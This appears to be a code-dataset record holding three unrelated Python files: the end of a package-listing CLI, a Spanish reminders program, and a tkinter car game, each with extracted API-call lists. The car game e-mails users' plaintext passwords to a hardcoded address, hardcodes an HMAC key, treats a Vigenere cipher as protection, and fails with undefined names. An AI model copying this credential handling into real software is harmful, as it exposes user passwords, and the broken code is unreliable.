            # ValueError (installed version not among the PyPI releases).
            version_index = len(pypi_rel)
        # Show the newest releases down to (a bit past) the installed one.
        for version in pypi_rel[0 : version_index + 3]:
            print(Fore.WHITE + Style.BRIGHT + "  Version %s" % version, end=" ")
            if version == pypi_rel[0]:
                print(Fore.BLUE + Style.BRIGHT + "[last version]", end=" ")
            if version == pkg_dist_version:
                print(Fore.GREEN + Style.BRIGHT + "[your version]", end="")
            print()
        print()
        if pypi_last_version > current_version:
            print(
                Fore.RED
                + Style.BRIGHT
                + " Your version is outdated, you're using "
                + Fore.WHITE
                + Style.BRIGHT
                + "v.%s," % pkg_dist_version
                + Fore.RED
                + Style.BRIGHT
                + " but the last version is "
                + Fore.WHITE
                + Style.BRIGHT
                + "v.%s !" % pypi_rel[0]
            )
        if pypi_last_version == current_version:
            print(Fore.GREEN + Style.BRIGHT + " Your version is updated !")
        if pypi_last_version < current_version:
            print(
                Fore.YELLOW
                + Style.BRIGHT
                + " Your version newer than the version available at PyPI !"
            )
            print(
                Fore.YELLOW
                + Style.BRIGHT
                + " You're using "
                + Fore.WHITE
                + Style.BRIGHT
                + "v.%s," % pkg_dist_version
                + Fore.YELLOW
                + Style.BRIGHT
                + " but the last version in PyPI "
                + Fore.WHITE
                + Style.BRIGHT
                + "v.%s !" % pypi_rel[0]
            )
    else:
        print("No versions found on PyPI !")
def cmd_scripts(args):
    """Implements the ``plp scripts`` command: lists installed console
    scripts, optionally filtered by a case-insensitive name substring."""
    name_filter = args["<filter>"]
    print(
        Fore.YELLOW
        + Style.BRIGHT
        + "Script Name".ljust(23)
        + "Project Name".ljust(21)
        + "Module Name"
    )
    print("-" * 80)
    for ep in pkg_resources.iter_entry_points("console_scripts"):
        if name_filter and name_filter.lower() not in ep.name.lower():
            continue
        # One print emits exactly what the old chain of end=""-prints produced.
        row = (Fore.GREEN + Style.BRIGHT + ep.name.ljust(22)
               + Fore.WHITE + Style.NORMAL + str(ep.dist).ljust(20)
               + Fore.BLUE + Style.BRIGHT + ep.module_name
               + Fore.BLUE + Style.NORMAL + "(" + ep.attrs[0] + ")")
        print(row)
def cmd_paste(args):
    """Implements the ``plp paste`` command: uploads the package list to
    the Teknik paste service and prints the resulting URL."""
    form = urllib.parse.urlencode({"code": create_paste_template()})
    response = urllib.request.urlopen(TEKNIK_PASTE_API, form.encode("utf-8"))
    posted = json.loads(response.read().decode("utf-8"))
    if "result" in posted:
        print(
            Fore.GREEN + Style.BRIGHT + "Paste url: {}".format(posted["result"]["url"])
        )
    else:
        print(Fore.RED + Style.BRIGHT + "ERROR PASTE!")
def run_main():
    """Cilantropy - Python List Packages (PLP)
    Usage:
      plp list [--compact] [<filter>]
      plp show <project_name>
      plp check <project_name>
      plp scripts [<filter>]
      plp paste [list your packages to pastebin service]
      plp (-h | --help)
      plp --version
    Options:
      --compact     Compact list format
      -h --help     Show this screen.
      --version     Show version.
    """
    # NOTE: the docstring above is runtime data — docopt builds the whole
    # CLI from it, so its wording and layout must not be edited casually.
    init(autoreset=True)  # colorama: reset colors after every print
    arguments = docopt(
        run_main.__doc__,
        version="Cilantropy v.%s - Python List Packages (PLP)" % __version__,
    )
    # Dispatch to the selected sub-command.
    if arguments["list"]:
        cmd_list(arguments)
    if arguments["show"]:
        cmd_show(arguments)
    if arguments["check"]:
        cmd_check(arguments)
    if arguments["scripts"]:
        cmd_scripts(arguments)
    if arguments["paste"]:
        cmd_paste(arguments)
if __name__ == "__main__":
    run_main()
|
[
"colorama.init",
"pkg_resources.iter_entry_points",
"urllib.parse.urlencode",
"docopt.docopt"
] |
[((8458, 8508), 'pkg_resources.iter_entry_points', 'pkg_resources.iter_entry_points', (['"""console_scripts"""'], {}), "('console_scripts')\n", (8489, 8508), False, 'import pkg_resources\n'), ((8983, 9030), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'code': template_data}"], {}), "({'code': template_data})\n", (9005, 9030), False, 'import urllib\n'), ((9817, 9837), 'colorama.init', 'init', ([], {'autoreset': '(True)'}), '(autoreset=True)\n', (9821, 9837), False, 'from colorama import init\n'), ((9855, 9954), 'docopt.docopt', 'docopt', (['run_main.__doc__'], {'version': "('Cilantropy v.%s - Python List Packages (PLP)' % __version__)"}), "(run_main.__doc__, version=\n 'Cilantropy v.%s - Python List Packages (PLP)' % __version__)\n", (9861, 9954), False, 'from docopt import docopt\n')]
|
# Reminders program
import pickle
import os
# Create an empty list persisted in a pickle file named 'outfile' if none
# exists yet; otherwise load the previously created one.
if os.path.isfile('./outfile') == False:
    recordatorios = []
    with open('outfile', 'wb') as fp:
        pickle.dump(recordatorios, fp)
else:
    with open ('outfile', 'rb') as fp:
        recordatorios = pickle.load(fp)
# Menu of available options (user-facing text is intentionally in Spanish)
print('Opciones:')
print('\
1 - Ver recordatorios\n\
2 - Agregar items\n\
3 - Quitar items\n\
4 - Salir\
')
# Print the list vertically, numbering the items starting at 1.
def mostrar_items(lista):
    """Display every reminder on its own line with a 1-based index."""
    print("Recordatorios:")
    for numero, recordatorio in enumerate(lista, start=1):
        print(" ", numero, "-", recordatorio)
# Main function: interactive command loop for the reminder program.
# NOTE(review): the "loop" is implemented by recursive main() calls, so a
# very long session would eventually hit Python's recursion limit; also the
# list is only persisted when the user picks option 4 (exit).
def main():
    ordenes = int(input('Que queres hacer?... '))
    if ordenes == 1:
        # Option 1: show reminders (or a message when there are none)
        if recordatorios == []:
            print("No tenes recordatorios.")
            main()
        else:
            mostrar_items(recordatorios)
            main()
    elif ordenes == 2:
        # Option 2: add a new reminder (capitalized)
        agregar_recordar = input('Ingresa de lo que queres que te recuerde... ')
        recordatorios.append(agregar_recordar.capitalize())
        mostrar_items(recordatorios)
        main()
    elif ordenes == 3:
        # Option 3: delete a reminder by its displayed 1-based number
        mostrar_items(recordatorios)
        item = int(input('Ingresa el numero de item a eliminar: '))
        del recordatorios[item - 1]
        mostrar_items(recordatorios)
        main()
    elif ordenes == 4:
        # Option 4: persist the list to the pickle file and quit
        with open('outfile', 'wb') as fp:
            pickle.dump(recordatorios, fp)
        quit('Adios!')
    else:
        print('Error, intenta de nuevo.')
        main()
main()
|
[
"os.path.isfile",
"pickle.load",
"pickle.dump"
] |
[((174, 201), 'os.path.isfile', 'os.path.isfile', (['"""./outfile"""'], {}), "('./outfile')\n", (188, 201), False, 'import os\n'), ((281, 311), 'pickle.dump', 'pickle.dump', (['recordatorios', 'fp'], {}), '(recordatorios, fp)\n', (292, 311), False, 'import pickle\n'), ((381, 396), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (392, 396), False, 'import pickle\n'), ((1543, 1573), 'pickle.dump', 'pickle.dump', (['recordatorios', 'fp'], {}), '(recordatorios, fp)\n', (1554, 1573), False, 'import pickle\n')]
|
from tkinter import *
from tkinter import messagebox, colorchooser
from logging import basicConfig, warning, info, error, DEBUG
from os import getcwd, path, mkdir
from time import strftime, time, localtime
from json import dump, load
from re import findall, search
from hmac import new, compare_digest
from hashlib import sha224, sha512
from secrets import choice
from string import ascii_letters
from requests import get
from smtplib import SMTP, SMTPRecipientsRefused
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class Vigenere:
    """Classic Vigenere cipher over the upper-case alphabet A-Z.

    Messages are upper-cased and stripped of non-letter characters
    (whitespace, digits, punctuation) before the cipher is applied, matching
    the original behaviour; characters outside A-Z are now silently dropped
    instead of crashing. The key is expected to be alphabetic.

    Improvements over the previous version: intermediate values are no
    longer stored as instance attributes (the old code mutated
    ``self.secret_key`` and leaked a dozen work lists onto the instance on
    every call), and each letter is shifted with modular arithmetic instead
    of rebuilding a rotated 26-letter alphabet per character.
    """

    def __init__(self):
        # Kept for backward compatibility: external code may read these.
        self.letter_list = 'A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'.split(' ')
        self.number_list = list(range(26))

    @staticmethod
    def _clean(msg):
        """Upper-case ``msg`` and keep only the letters A-Z."""
        return [c for c in msg.upper() if 'A' <= c <= 'Z']

    def encipher(self, msg, secret_key):
        """Encrypt ``msg`` with ``secret_key``; returns upper-case ciphertext."""
        letters = self._clean(msg)
        key = secret_key.upper()
        out = []
        for i, ch in enumerate(letters):
            # key repeats cyclically over the cleaned message
            shift = ord(key[i % len(key)]) - ord('A')
            out.append(chr((ord(ch) - ord('A') + shift) % 26 + ord('A')))
        return ''.join(out)

    def decipher(self, msg, secret_key):
        """Decrypt ciphertext ``msg`` with ``secret_key``."""
        letters = self._clean(msg)
        key = secret_key.upper()
        out = []
        for i, ch in enumerate(letters):
            shift = ord(key[i % len(key)]) - ord('A')
            out.append(chr((ord(ch) - ord('A') - shift) % 26 + ord('A')))
        return ''.join(out)
class GUI():
    """Tkinter front-end for the car game.

    Builds the main window with File / Cars / Account Manage menus, a
    right-click context menu, colour configuration, account registration
    (with e-mail confirmation) and login, plus car-creation dialogs.
    """
    def __init__(self):
        """Build the main window, menus and bindings, then enter mainloop."""
        CreateLogFile()
        # Load the saved background colour; on first run fall back to the
        # Tk default (None) and create the config file.
        try:
            self.newcolor = Config('color.json').loadfile()
        except FileNotFoundError:
            self.newcolor = None
            Config('color.json').createfile(self.newcolor)
        self.root = Tk()
        self.root.title('Car Game')
        self.root.resizable(0, 0)
        # Download the window icon on first run if it is missing locally.
        try:
            open('.\\.image\\car.ico')
            self.root.iconbitmap('.\\.image\\car.ico')
        except FileNotFoundError:
            CreateFolder('.image')
            with open('.\\.image\\car.ico', 'wb') as code:
                code.write(get('https://www.easyicon.net/download/ico/1284184/128/').content)
        self.rstr = StringVar()
        self.rint = IntVar()
        # Centre the fixed 750x600 window on the screen.
        self.screenwidth = self.root.winfo_screenwidth()
        self.screenheight = self.root.winfo_screenheight()
        alignstr = f'750x600+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
        self.root.geometry(alignstr)
        self.lable = Label(self.root, height = 600, width = 750, bd = 0, \
                           bg = self.newcolor, highlightthickness = 0)
        self.lable.pack()
        # NOTE(review): pack() returns None, so self.check_account holds
        # None rather than the Label widget — confirm intended (see the
        # commented-out line below, which suggests the chained call crept in).
        self.check_account = Label(self.root, height = 200, width = 200, bd = 0, \
                                   bg = self.newcolor, highlightthickness = 0, text = 'l').pack(anchor = 'nw')
        #self.check_account.pack(anchor = 'nw')
        # Menu bar: File, Cars and Account Manage cascades, plus a
        # right-click context menu bound to the background label.
        self.menu = Menu(self.root, bd = 0, tearoff = False)
        self.file = Menu(self.menu, tearoff = False)
        self.menu.add_cascade(label = 'File', menu = self.file)
        self.file.add_command(label = 'Edit Color', command = self.color)
        self.file.add_separator()
        self.file.add_command(label = 'Exit', command = self.rquit)
        self.rmenu = Menu(self.root, tearoff = False)
        self.rmenu.add_command(label = 'Exit', command = self.rquit)
        self.lable.bind('<Button-3>', self.popup)
        self.createcar = Menu(self.menu, tearoff = False)
        self.menu.add_cascade(label = 'Cars', menu = self.createcar)
        self.createcar.add_command(label = 'Create New Car', \
                                   command = self.create_car_gui)
        self.account = Menu(self.menu, tearoff = False)
        self.menu.add_cascade(label = 'Account Manage', menu = self.account)
        self.account.add_command(label = 'Login', command = self.login)
        self.account.add_command(label = 'Register', command = self.register)
        self.root.config(menu = self.menu)
        self.root.mainloop()
    def register(self):
        """Open the account-registration dialog (username/email/password)."""
        self.registertop = Toplevel(bg = self.newcolor)
        self.registertop.title('Register')
        self.registertop.resizable(0, 0)
        alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
        self.registertop.geometry(alignstr)
        self.registertop.iconbitmap('.\\.image\\car.ico')
        label1 = Label(self.registertop, text = 'User Name', \
                       bg = self.newcolor).place(relx = .025, rely = .03)
        self.username = Entry(self.registertop, bg = self.newcolor)
        self.username.place(relx = .45, rely = .04)
        label2 = Label(self.registertop, text = 'Email', \
                       bg = self.newcolor).place(relx = .025, rely = .14)
        self.emailname = Entry(self.registertop, bg = self.newcolor)
        self.emailname.place(relx = .45, rely = .15)
        label3 = Label(self.registertop, text = 'Password', \
                       bg = self.newcolor).place(relx = .025, rely = .25)
        self.password = Entry(self.registertop, bg = self.newcolor, show = '*')
        self.password.place(relx = .45, rely = .26)
        label4 = Label(self.registertop, text = 'Confirm Password', \
                       bg = self.newcolor).place(relx = .025, rely = .36)
        self.conpassword = Entry(self.registertop, bg = self.newcolor, show = '*')
        self.conpassword.place(relx = .45, rely = .37)
        button = Button(self.registertop, text = 'Create Account', \
                        command = self.registervalid, \
                        bg = self.newcolor).place(relx = .5, rely = .8, \
                                                  anchor = 'center')
    def registervalid(self):
        """Validate the registration form; on success, send the e-mail.

        On any failure the dialog is simply re-opened.
        """
        self.user = self.username.get()
        self.em = self.emailname.get()
        self.word = self.password.get()
        self.cword = self.conpassword.get()
        self.valid1 = self.valid2 = self.valid3 = self.valid4 = self.valid5 = True
        if not self.user.split():
            warninput = messagebox.showwarning('Warning', 'No input of username')
            warning('No input of username.')
            self.valid1 = False
        # An account file with this name already exists.
        if path.isfile(getcwd() + f'\\.account\\{self.user}.json'):
            infoinput = messagebox.showinfo('Info', f'Username \'{self.user}\' has already exists')
            warning(f'Username \'{self.user}\' has already exists.')
            self.valid1 = False
        if not self.em.split():
            warninput = messagebox.showwarning('Warning', 'No input of email')
            warning('No input of email.')
            self.valid2 = False
        if not self.word.split():
            warninput = messagebox.showwarning('Warning', 'No input of password')
            warning('No input of password.')
            self.valid3 = False
        if self.word != self.cword:
            errorinput = messagebox.showerror('Error', 'Passwords are not the same')
            error('Passwords are not the same.')
            self.valid4 = False
        if not self.valid1 or not self.valid2 or not self.valid3 or not self.valid4:
            self.register()
        else:
            self.send_email()
    def send_email(self):
        """E-mail the new password to the user, then finish registration.

        Sends via SMTP with STARTTLS; a refused recipient marks the e-mail
        address invalid and re-opens the registration dialog.
        """
        msg = MIMEMultipart()
        msg.attach(MIMEText(f'Dear {self.user}: \n\tYour Password is {self.word}.', 'plain', 'utf-8'))
        sender = '<EMAIL>'
        password = '<PASSWORD>'
        receiver = self.em
        # NOTE(review): the address from the form is immediately overwritten
        # with a fixed recipient — confirm this debugging override is intended.
        receiver = '<EMAIL>' #HU<PASSWORD>
        msg['From'] = sender
        msg['To'] = receiver
        msg['Subject'] = 'Confirm Password'
        # Attach the colour config file to the confirmation mail.
        with open(getcwd() + '\\.config\\color.json', 'rb') as send_file:
            att = MIMEText(send_file.read(), 'base64', 'utf-8')
        att['Content-Type'] = 'application/octet-stream'
        att['Content-Disposition'] = 'attachment;filename="color.json"'
        msg.attach(att)
        smtp_server = 'smtp.yeah.net'
        server = SMTP(smtp_server, 25)
        server.ehlo()
        server.starttls()
        server.login(sender, password)
        server.set_debuglevel(False)
        try:
            server.sendmail(sender, receiver, msg.as_string())
        except SMTPRecipientsRefused:
            # Recipient rejected: flag failure and notify a fallback address.
            self.valid5 = False
            msg['To'] = '<EMAIL>'
            server.sendmail(sender, '<EMAIL>', msg.as_string())
        server.quit()
        if self.valid5:
            messagebox.showinfo('Successful', f'Successfuly create account {self.user}')
            info(f'Successfuly create account \'{self.user}\'.')
            self.encrypt_register(self.word)
        else:
            messagebox.showerror('Error', f'Email \'{self.em}\' is uncorrect')
            error(f'Email \'{self.em}\' is uncorrect.')
            self.register()
    def encrypt_register(self, password):
        """Hash the Vigenere-enciphered password and store the account file."""
        encrypted_password = Vigenere().encipher(password, '<PASSWORD>')
        # Salted SHA-512 of the enciphered password.
        onepass = sha512(b'2<PASSWORD>asdfwerxdf34sdfsdfs90')
        onepass.update(encrypted_password.encode())
        import hashlib
        self.signp = b'GQnIdFUUAUDlcepuaDVGJpnmfRektPLT'
        # NOTE(review): `signp` is undefined in this scope (self.signp was
        # just assigned) — this line raises NameError at runtime; it
        # presumably should read self.signp.
        sign = new(signp, onepass.hexdigest().encode('utf-8'), \
                   digestmod = sha224).hexdigest()
        Account(f'{self.user}.json').createfile([onepass.hexdigest(), 'fdfskfg', sign])
    def login(self):
        """Open the login dialog (username/password)."""
        self.logintop = Toplevel(bg = self.newcolor)
        self.logintop.title('Login')
        self.logintop.resizable(0, 0)
        alignstr = f'250x75+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
        self.logintop.geometry(alignstr)
        self.logintop.iconbitmap('.\\.image\\car.ico')
        label1 = Label(self.logintop, text = 'User Name', \
                       bg = self.newcolor).place(relx = .025, rely = .07)
        self.username = Entry(self.logintop, bg = self.newcolor)
        self.username.place(relx = .45, rely = .08)
        label2 = Label(self.logintop, text = 'Password', \
                       bg = self.newcolor).place(relx = .025, rely = .34)
        self.password = Entry(self.logintop, bg = self.newcolor, show = '*')
        self.password.place(relx = .45, rely = .35)
        button = Button(self.logintop, text = 'Login', command = self.loginvalid, \
                        bg = self.newcolor).place(relx = .5, rely = .8, \
                                                  anchor = 'center')
    def loginvalid(self):
        """Check that the account file exists, then verify the password."""
        self.userget = self.username.get()
        self.valid = True
        if not path.isfile(getcwd() + f'\\.account\\{self.userget}.json'):
            infoinput = messagebox.showinfo('Info', f'Username \'{self.userget}\' hasn\'t already exists')
            warning(f'Username \'{self.userget}\' hasn\'t already exists.')
            self.valid = False
            self.login()
        else:
            self.decrypt_login(self.password.get())
    def decrypt_login(self, password):
        """Verify a login attempt against the stored account record.

        NOTE(review): `sign` is undefined in this scope (NameError at
        runtime), self.signp is only ever set during registration, and the
        entered `password` is never hashed for comparison — this method
        needs rework; flagged rather than guessed at.
        """
        loadaccount = Account(f'{self.userget}.json').loadfile()
        dsign = new(self.signp, loadaccount[0].encode('utf-8'), digestmod = sha224).hexdigest()
        print(compare_digest(sign, dsign))
    def popup(self, event):
        """Show the right-click context menu at the pointer position."""
        self.rmenu.post(event.x_root, event.y_root)
    def color(self):
        """Ask for a new background colour, save it, and rebuild the UI."""
        self.newcolor = colorchooser.askcolor(self.newcolor, title = 'Choose a color')[1]
        if self.newcolor:
            Config('color.json').createfile(self.newcolor)
            info(f'Edited color config: {self.newcolor}.')
        # Re-run __init__ so the whole window picks up the new colour.
        self.root.destroy()
        self.__init__()
    def create_car(self):
        """Validate the car form and, after confirmation, persist the car.

        The int() round-trip below deliberately rejects purely numeric
        manufacturer/name input (they must remain strings), while the year
        must convert to an int.
        """
        self.get_manufacturer = self.manufacturer.get()
        self.get_name = self.name.get()
        self.get_year = self.year.get()
        # rint: 0 = plain Car, 1 = ElectricCar.
        if self.rint.get():
            self.new_car = ElectricCar(self.get_manufacturer, self.get_name, \
                                       self.get_year)
            self.new_car_name = self.new_car.get_descriptive_name()
        else:
            self.new_car = Car(self.get_manufacturer, self.get_name, self.get_year)
            self.new_car_name = self.new_car.get_descriptive_name()
        self.valid1 = False
        self.valid2 = False
        self.valid3 = False
        if self.get_manufacturer:
            try:
                self.get_manufacturer = int(self.get_manufacturer)
            except:
                pass
            if isinstance(self.get_manufacturer, str):
                self.valid1 = True
            else:
                warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer')
                error(f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer.')
        else:
            warninput = messagebox.showwarning('Warning', 'No input of manufacturer')
            warning('No input of manufacturer.')
        if self.get_name:
            try:
                self.get_name = int(self.get_name)
            except:
                pass
            if isinstance(self.get_name, str):
                self.valid2 = True
            else:
                warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_name).__name__}\' of name')
                error(f'Invalid Type \'{type(self.get_name).__name__}\' of name.')
        else:
            warninput = messagebox.showwarning('Warning', 'No input of name')
            warning('No input of name.')
        if self.get_year:
            try:
                self.get_year = int(self.get_year)
            except:
                warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_year).__name__}\' of year')
                error(f'Invalid Type \'{type(self.get_year).__name__}\' of year.')
            if isinstance(self.get_year, int):
                self.valid3 = True
        else:
            warninput = messagebox.showwarning('Warning', 'No input of year')
            warning('No input of year.')
        ele = 'eletric car' if self.rint.get() else 'car'
        if self.valid1 and self.valid2 and self.valid3:
            self.confirm = messagebox.askyesno('Confirm', f'Create new {ele}: \n{self.new_car_name}')
            if self.confirm:
                # Append (ifadd=True) the new car record to cars.json.
                Config('cars.json').createfile({'Name': self.new_car_name, \
                                                'Type': ele.title()}, True)
                messagebox.showinfo('Successful', f'Successfuly create {ele} \'{self.new_car_name}\'')
                info(f'Successfuly create {ele} \'{self.new_car_name}\'.')
        else:
            self.create_car_gui()
    def set_battery_gui(self):
        """Open a (partial) dialog for choosing a battery capacity."""
        self.batterytop = Toplevel(bg = self.newcolor)
        self.batterytop.title('Set Battery -kWh')
        self.batterytop.resizable(0, 0)
        alignstr = f'250x100+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
        self.batterytop.geometry(alignstr)
        self.batterytop.iconbitmap('.\\.image\\car.ico')
        # NOTE(review): the radiobutton's parent is self.cartop, not the new
        # self.batterytop window — confirm which window it should live in.
        self.battery_button1 = Radiobutton(self.cartop, text = '60 -kWh', \
                                           variable = self.rint, bg = self.newcolor, \
                                           value = 0, indicatoron = False).pack()
    def create_car_gui(self):
        """Open the car-creation dialog (type, manufacturer, name, year)."""
        self.cartop = Toplevel(bg = self.newcolor)
        self.cartop.title('Create Car')
        self.cartop.resizable(0, 0)
        alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
        self.cartop.geometry(alignstr)
        self.cartop.iconbitmap('.\\.image\\car.ico')
        self.radiobutton1 = Radiobutton(self.cartop, text = 'Car', variable = self.rint, \
                                        bg = self.newcolor, value = 0).pack()
        self.radiobutton2 = Radiobutton(self.cartop, text = 'Eletric Car', variable = self.rint, \
                                        bg = self.newcolor, value = 1).pack()
        label1 = Label(self.cartop, text = 'Car Manufacturer: (Str)', \
                       bg = self.newcolor).pack()
        self.manufacturer = Entry(self.cartop, bg = self.newcolor)
        self.manufacturer.pack()
        label2 = Label(self.cartop, text = 'Car Name: (Str)', \
                       bg = self.newcolor).pack()
        self.name = Entry(self.cartop, bg = self.newcolor)
        self.name.pack()
        label3 = Label(self.cartop, text = 'Year: (Int)', \
                       bg = self.newcolor).pack()
        # Year spinner: from 15 years ago to next year.
        self.year = Spinbox(self.cartop, from_ = localtime()[0] - 15, \
                            to = localtime()[0] + 1, bg = self.newcolor)
        self.year.pack()
        button = Button(self.cartop, text = 'Create', command = self.create_car, \
                        bg = self.newcolor).pack()
    def rquit(self):
        """Close the main window (and therefore end mainloop)."""
        self.root.destroy()
def CreateFolder(pathcwd):
    """Create folder `pathcwd` under the current directory if absent.

    The Windows-style '\\' separator of the original is preserved.
    """
    target = getcwd() + '\\%s' % pathcwd
    if not path.exists(target):
        mkdir(target)
def CreateLogFile():
    """Configure root logging to append to .log\\logs.log, creating .log."""
    CreateFolder('.log')
    logfile = getcwd() + '\\.log\\logs.log'
    basicConfig(format = '%(asctime)s %(levelname)s: %(message)s',
                datefmt = '%Y-%m-%d %H:%M:%S', filename = logfile,
                filemode = 'a', level = DEBUG)
class Config():
    """Persist JSON values as files inside the .config folder."""
    def __init__(self, filename):
        """Ensure the .config folder exists and remember the file name."""
        CreateFolder('.config')
        self.filename = filename
    def createfile(self, msg, ifadd = False):
        """Serialise `msg` as JSON; append to the file when `ifadd` is true."""
        configfolder = getcwd() + '\\.config\\%s' % self.filename
        mode = 'a' if ifadd else 'w+'
        with open(configfolder, mode = mode) as file:
            dump(msg, file)
        return
    def loadfile(self):
        """Read the config file, cache the parsed JSON and return it."""
        configfolder = getcwd() + '\\.config\\%s' % self.filename
        with open(configfolder, mode = 'r') as file:
            self.fileinfo = load(file)
        return self.fileinfo
class Account():
    """Persist account records as JSON files inside the .account folder."""
    def __init__(self, filename):
        """Ensure the .account folder exists and remember the file name."""
        CreateFolder('.account')
        self.filename = filename
    def createfile(self, msg):
        """Overwrite the account file with `msg` serialised as JSON."""
        target = getcwd() + '\\.account\\%s' % self.filename
        with open(target, mode = 'w+') as file:
            dump(msg, file)
        return
    def loadfile(self):
        """Read the account file, cache the parsed JSON and return it."""
        target = getcwd() + '\\.account\\%s' % self.filename
        with open(target, mode = 'r') as file:
            self.fileinfo = load(file)
        return self.fileinfo
class Car():
    """A basic car with make/model/year and a roll-back-protected odometer."""
    def __init__(self, make, model, year):
        """Store the car's identity, set up logging, zero the odometer."""
        CreateLogFile()
        self.make = make
        self.model = model
        self.year = year
        self.odometer_reading = 0
    def get_descriptive_name(self):
        """Return the title-cased "<year> <make> <model>" name and log it.

        The string is also cached on self.descriptive, as before.
        """
        # Reuse descriptive_name() instead of duplicating its format string.
        self.descriptive = self.descriptive_name()
        info(f'Getting car name: {self.descriptive}')
        return self.descriptive
    def descriptive_name(self):
        """Return the title-cased "<year> <make> <model>" name (no logging)."""
        return f'{str(self.year)} {self.make} {self.model}'.title()
    def update_odometer(self, mileage):
        """Set the odometer, refusing (with a log warning) to roll it back."""
        if mileage >= self.odometer_reading:
            self.odometer_reading = mileage
        else:
            warning('Rolling back an odometer.')
    def read_odometer(self):
        """Return a sentence describing the current mileage."""
        return f'This car has {str(self.odometer_reading)} miles on it.'
    def get_odometer(self):
        """Return (and log) the raw odometer value."""
        info(f'Getting odometer: {self.odometer_reading}')
        return self.odometer_reading
    def increment_odometer(self, miles):
        """Add `miles` to the odometer (negative values are not rejected)."""
        self.odometer_reading += miles
class ElectricCar(Car):
    """A Car variant that additionally carries a battery pack."""
    def __init__(self, make, model, year):
        # Initialise the base Car, then attach a fixed 85 kWh battery.
        super().__init__(make, model, year)
        self.battery = Battery(85)
class Battery():
    """A simple model of an electric-car battery."""
    def __init__(self, battery_size = 60):
        # Capacity in kWh; defaults to the base 60 kWh pack.
        self.battery_size = battery_size
    def describe_battery(self):
        """Return a human-readable description of the capacity."""
        return f'This car has a {str(self.battery_size)} -kWh battery.'
    def get_range(self):
        """Return the approximate range sentence for this battery size.

        Raises ValueError for sizes other than 60 or 85 (the original
        shadowed the builtin `range` and raised UnboundLocalError there).
        """
        ranges = {60: 340, 85: 685}
        try:
            miles = ranges[self.battery_size]
        except KeyError:
            raise ValueError(f'Unknown battery size: {self.battery_size}')
        return f'This car can go approximately {str(miles)} miles on a full charge.'
class Mainloop():
    """Demo driver for the module.

    NOTE(review): this is a class whose *body* is a script — everything
    below runs once at class-definition time (opening the blocking GUI,
    creating demo cars, printing their details, writing test.json), not
    when Mainloop() is instantiated.  Confirm whether this should be a
    function under an `if __name__ == '__main__':` guard instead.
    """
    CreateLogFile()
    info('Opened GUI application.')
    # Blocks here until the Tk window is closed.
    GUI()
    Audi_Q5 = Car('Audi', 'Q5', 2018)
    print(Audi_Q5.get_descriptive_name())
    Audi_Q5.update_odometer(7884)
    print(Audi_Q5.read_odometer())
    print()
    Tesla_Model3 = ElectricCar('Tesla', 'Model 3', 2020)
    print(Tesla_Model3.get_descriptive_name())
    Tesla_Model3.update_odometer(397)
    print(Tesla_Model3.read_odometer())
    print(Tesla_Model3.battery.describe_battery())
    print(Tesla_Model3.battery.get_range())
    descriptive_dict = {'Name': Audi_Q5.descriptive_name(), \
                        'Odometer': Audi_Q5.get_odometer()}
    print(descriptive_dict)
    Config('test.json').createfile(descriptive_dict)
# All of Mainloop's work already ran at class-definition time above;
# this call only creates an (empty) instance.
Mainloop()
|
[
"email.mime.text.MIMEText",
"hmac.compare_digest",
"hashlib.sha512",
"logging.error",
"smtplib.SMTP",
"logging.warning",
"email.mime.multipart.MIMEMultipart",
"re.findall",
"requests.get",
"time.localtime",
"json.dump",
"tkinter.messagebox.showinfo",
"tkinter.colorchooser.askcolor",
"tkinter.messagebox.showerror",
"json.load",
"os.getcwd",
"tkinter.messagebox.showwarning",
"logging.info",
"tkinter.messagebox.askyesno"
] |
[((23149, 23180), 'logging.info', 'info', (['"""Opened GUI application."""'], {}), "('Opened GUI application.')\n", (23153, 23180), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((838, 946), 're.findall', 'findall', (['"""[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\'\\\\<\\\\>\\\\?,./", ]"""', 'msg'], {}), '(\n \'[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\\\'\\\\<\\\\>\\\\?,./", ]\'\n , msg)\n', (845, 946), False, 'from re import findall, search\n'), ((2411, 2519), 're.findall', 'findall', (['"""[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\'\\\\<\\\\>\\\\?,./", ]"""', 'msg'], {}), '(\n \'[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\\\'\\\\<\\\\>\\\\?,./", ]\'\n , msg)\n', (2418, 2519), False, 'from re import findall, search\n'), ((9996, 10011), 'email.mime.multipart.MIMEMultipart', 'MIMEMultipart', ([], {}), '()\n', (10009, 10011), False, 'from email.mime.multipart import MIMEMultipart\n'), ((10763, 10784), 'smtplib.SMTP', 'SMTP', (['smtp_server', '(25)'], {}), '(smtp_server, 25)\n', (10767, 10784), False, 'from smtplib import SMTP, SMTPRecipientsRefused\n'), ((11758, 11801), 'hashlib.sha512', 'sha512', (["b'2<PASSWORD>asdfwerxdf34sdfsdfs90'"], {}), "(b'2<PASSWORD>asdfwerxdf34sdfsdfs90')\n", (11764, 11801), False, 'from hashlib import sha224, sha512\n'), ((21763, 21808), 'logging.info', 'info', (['f"""Getting car name: {self.descriptive}"""'], {}), "(f'Getting car name: {self.descriptive}')\n", (21767, 21808), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), 